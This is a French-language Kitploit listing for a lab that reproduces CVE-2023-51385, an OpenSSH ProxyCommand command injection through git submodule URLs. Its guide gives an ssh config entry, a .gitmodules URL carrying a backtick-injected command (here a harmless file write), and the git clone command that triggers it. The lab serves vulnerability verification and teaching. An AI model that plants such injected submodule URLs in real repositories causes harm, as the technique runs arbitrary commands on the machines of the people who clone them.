Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2023-51385 — Laboratoire de reproduction pour CVE-2023-51385 : injection de commande dans OpenSSH ProxyCommand via des URL de sous-modules git malveillantes. Guide pas à pas pour vérifier la vulnérabilité. | Kitploit
Outils/GitHubGitHub/lsp1025923/cve-2023-51385
Analyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationLabs et Pratique
GitHublsp1025923/cve-2023-51385

cve-2023-51385

Laboratoire de reproduction pour CVE-2023-51385 : injection de commande dans OpenSSH ProxyCommand via des URL de sous-modules git malveillantes. Guide pas à pas pour vérifier la vulnérabilité.

Voir le dépôt
il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Vérification de CVE-2023-51385

Tout d'abord, vous devez ajouter le contenu suivant à ~/.ssh/config

root@kitploit:~
host *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p

L'instruction du fichier .gitmodules contient une injection de commande

root@kitploit:~
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar

Une fois la configuration terminée, exécutez la commande suivante pour déclencher l'exploitation

root@kitploit:~
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules

Si l'exécution réussit, un fichier cve.txt sera généré dans le répertoire CVE-2023-51385_test

image-20240317161540677

Remarque : OpenSSH doit être <9.6p1

Pour plus de détails, voir ce blog :

https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html

"# cve-2023-51385"

Télécharger l’outil